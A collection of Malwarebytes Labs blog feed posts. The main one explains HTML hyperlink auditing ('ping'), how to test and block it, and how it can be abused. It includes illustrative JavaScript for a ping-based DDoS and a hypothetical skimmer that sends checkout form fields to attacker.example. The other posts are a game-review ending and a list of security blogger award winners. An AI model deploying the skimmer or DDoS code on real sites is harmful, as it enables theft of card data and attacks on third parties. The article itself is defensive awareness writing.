Is this the best hacking game ever made? I couldn’t possibly say. Is it the most fleshed out? I would say so, and anyone looking for an occasionally tricky gamified introduction to digital jousting should give it a look. I’d have loved something like this when I was growing up, and if it helps encourage teenagers (or anyone else, for that matter) to look at security as a career option, then that can only be a bonus.

The post Video game portrayals of hacking: NITE Team 4 appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hyperlink auditing: where has my option to disable it gone?

Malwarebytes - Thu, 06/06/2019 - 16:59

There is a relatively old method of following users around on the world wide web that might be gaining traction.

Most Internet users are aware of the fact that they are being tracked in several ways. (And awareness is a good start.) In a state of awareness, you can adjust your behavior accordingly, and if you feel it’s necessary, you can take countermeasures.

Which is why we want to bring the practice of link auditing to your attention: to make you aware of its existence, if you weren’t already. For those already in the know, you might be surprised to learn that browsers are taking away your option to disable hyperlink auditing.

What is hyperlink auditing?

Hyperlink auditing is a method for website builders to track which links on their site have been clicked on by visitors, and where these links point to. Hyperlink auditing is sometimes referred to as “pings.” This is because “ping” is the name of the link attribute hyperlink auditing uses to do the tracking.

From a technical perspective, hyperlink auditing is an HTML standard that allows the creation of special links that ping back to a specified URL when they are clicked on. These pings are done in the form of a POST request to the specified web page that can then examine the request headers to see what page the link was clicked on.
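
To give an idea of what that looks like on the wire (the host names here are made up, exact headers vary by browser, and the Ping-From header can be omitted for cross-origin pings), the request is roughly:

POST /collect HTTP/1.1
Host: tracker.example
Content-Type: text/ping
Ping-From: https://blog.example/some-article
Ping-To: https://shop.example/product

PING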

The syntax of this HTML5 feature is simple. A website builder can add hyperlink auditing to a link like this:

<a href="{destination url}" ping="{url that receives the information}">

Under normal circumstances, the second URL will point to some kind of script that will sort and store the received information to help generate tracking and usage information for the site. This can be done on the same domain, but it can also point to another domain or IP where the data can be processed.
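
As a rough illustration of that receiving end (purely a sketch; the port, path handling, and log format are arbitrary choices, not taken from any real site), a minimal Node.js handler could simply log the two headers each ping carries:

const http = require('http');

http.createServer((req, res) => {
  if (req.method === 'POST') {
    // Node lowercases header names; Ping-From can be absent for cross-origin pings
    const from = req.headers['ping-from'] || 'unknown page';
    const to = req.headers['ping-to'] || 'unknown destination';
    console.log('link to ' + to + ' was clicked on ' + from);
  }
  res.statusCode = 204; // the browser does not need anything back
  res.end();
}).listen(8080);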

What’s the difference between this and normal tracking?

Some of you might argue that there are other ways to track where we go and what we click. And you would be right. But those other methods rely on JavaScript, and browser users can choose whether or not to allow scripts to run. Hyperlink auditing does not give users this choice. If the browser allows it, it will work.

Which browsers allow link auditing?

Almost every browser allows hyperlink tracking, but until now most of them offered an option to disable it. Major browsers are now removing that option for their users.

As of press time, Chrome, Edge, Opera, and Safari already allow link auditing by default and offer no option to disable it. Firefox plans to follow suit in the near future, which is surprising, as Firefox is one of the few browsers that has it disabled by default. Firefox users can check the setting for hyperlink auditing under about:config > browser.send_pings.

How can I stop link auditing?

You can’t detect the presence of the “ping” attribute by hovering over a link, so you would have to examine the code of the site to check whether a link has that attribute or not. Or, for less technical users, there are some dedicated browser extensions that block link auditing. For Chrome users, there is an extension called Ping Blocker available in the Chrome Web Store.

Or you can resort to using a browser that is more privacy focused.
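
For the do-it-yourself crowd, a small userscript or extension content script along these lines will strip the attribute from links already on a page (a sketch only: it runs once, so links added to the page afterwards would need a re-run or a MutationObserver):

// Remove the ping attribute from every link and image-map area currently on the page
document.querySelectorAll('a[ping], area[ping]').forEach((el) => {
  el.removeAttribute('ping');
});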

Please read: How to tighten security and increase privacy on your browser

Test if your browser allows hyperlink auditing

The link in the test code below is harmless: it pings the test IP that we have created especially to check whether the Malwarebytes web protection module is working, without actually sending you to a malicious site. This test will show a warning prompt if the following conditions are met:

  • Malwarebytes Web Protection module is enabled
  • You are allowing Malwarebytes notifications (Settings > Notifications)
  • Your browser allows link auditing

Create a text file with the code posted below in it and save it as an HTML file. Right-click the HTML file and choose to open it with the browser you want to test. If the browser allows link auditing, you should see a Malwarebytes warning prompt when you click the link:

<a href="https://blog.malwarebytes.com" ping="https://iptest.malwarebytes.com">The ping in this link will be blocked by MBAM</a> Malwarebytes and hyperlink auditing

As demonstrated above, Malwarebytes will protect you if either one of the URLs in a link leads to a known malicious domain or IP. There are no immediate plans to integrate anti-ping functionality in our browser extensions, but it is under consideration. Should the need arise for this functionality to be integrated in any of our products, we will lend a listening ear to our customers.

Abuse of hyperlink auditing

Hyperlink auditing has reportedly been used in a DDoS attack. The attack involved users who visited a crafted web page that loaded two external JavaScript files. One of these included an array of URLs: the targets of the DDoS attack. The second JavaScript randomly selected a URL from the array, created an <a> tag with a ping attribute pointing at it, and programmatically clicked the link every second.
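
The pattern described above boils down to something like this (an illustrative approximation only; the URLs are placeholders, not the code that was actually observed):

// List supplied by the first script in the reported attack (placeholders here)
const targets = ['https://victim-one.example', 'https://victim-two.example'];

setInterval(() => {
  const target = targets[Math.floor(Math.random() * targets.length)];
  const link = document.createElement('a');
  link.href = '#'; // keeps the visitor on the crafted page
  link.setAttribute('ping', target); // following the link fires a POST at the target
  document.body.appendChild(link);
  link.click();
  link.remove();
}, 1000); // one forced click, and therefore one ping, every second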

Skimmers could also abuse hyperlink auditing if they figure out how to send form field information to a site under their control. If they were able to plant a script on a site, as they usually do, but use it to “ping” the data to their own server instead, the exfiltration would be hard for the site’s visitors to notice or block.
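
Conceptually (and purely hypothetically: the form selector and the collection domain below are invented for illustration, not taken from any observed skimmer), that abuse could be as small as:

// Hypothetical sketch of the scenario described above
const form = document.querySelector('form#checkout');
form.addEventListener('submit', () => {
  const fields = new URLSearchParams(new FormData(form)).toString(); // serialize what the visitor typed
  const link = document.createElement('a');
  link.href = '#'; // the real form submission continues as normal
  link.setAttribute('ping', 'https://attacker.example/c?' + fields); // the data rides along on the "audit" ping
  document.body.appendChild(link);
  link.click();
});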

Countermeasures

At the moment, there doesn’t seem to be an urgent need for the average Internet user to block hyperlink auditing. The only real problem here is that it takes third-party software to disable hyperlink auditing, when browsers should be offering us that option in their settings. More careful Internet users who disabled hyperlink auditing earlier are advised to check whether that setting still works in their browser: the option could be removed in an update, and you may have missed that this happened.

Stay safe everyone!

The post Hyperlink auditing: where has my option to disable it gone? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes Labs wins best cybersecurity vendor blog at InfoSec’s European Security Blogger Awards

Malwarebytes - Wed, 06/05/2019 - 19:21

Infosec Europe is now well underway, and last night was the annual EU Security Blogger Awards, where InfoSecurity Magazine:

…recognise[s] the best blogs in the industry as first nominated by peers and then judged by a panel of (mostly) respected industry experts.

Malwarebytes Labs was announced as winner of the Best Cybersecurity Vendor Blog. We previously won best corporate security blog in 2015 and 2016, and we were delighted to see we had several other nominations this year:

  • Best commercial Twitter account (@Malwarebytes)
  • Most educational blog for user awareness
  • Security hall of fame (for our own Jérôme Segura)
  • Grand Prix for best overall blog

It’s excellent to be recognised alongside such legendary security pros as Graham Cluley, Mikko Hyppönen, and Troy Hunt, as well as fellow security companies Tripwire, Sophos, Bitdefender, and many others. Without further ado, let’s see who won in the various categories.

The n00bs: Best new cybersecurity podcast

WINNER: Darknet Diaries

The n00bs: Best new/up and coming blog

WINNER: The Many Hats Club

The corporates: Best cybersecurity vendor blog

WINNER: Malwarebytes

The corporates: Best commercial Twitter account

WINNER: NCSC

Best cybersecurity podcast

WINNER: Smashing Security

Best cybersecurity video or cybersecurity video blog

WINNER: Jenny Radcliffe

Best personal (non-commercial) security blog

WINNER: 5w0rdFish

Most educational blog for user awareness

WINNER: NCSC

Most entertaining blog

WINNER: J4VV4D

Best technical blog

WINNER: Kevin Beaumont

Best Tweeter

WINNER: Quentynblog

Best Instagrammer

WINNER: Lausecurity

The legends of cybersecurity: hall of fame

WINNER: Troy Hunt

Grand Prix for best overall security blog

WINNER: Graham Cluley

Thank you!

We did indeed win an award thanks to your votes, and we can now set our Best Cybersecurity Vendor Blog trophy next to our two awards for Best Corporate Blog. We’ll continue to provide our readers with breaking news, in-depth research, educational guides on best practices, conference coverage, and much, much more.

We appreciate your votes, especially when there are so many excellent blogs out there, and we hope you might even find a few more valuable sources of information from the links above.

Congratulations to the winners, commiserations to everyone else, a hat-tip to the organisers, and a final round of applause to our readers. We couldn’t have done it without you.

The post Malwarebytes Labs wins best cybersecurity vendor blog at InfoSec’s European Security Blogger Awards appeared first on Malwarebytes Labs.

Categories: Techie Feeds
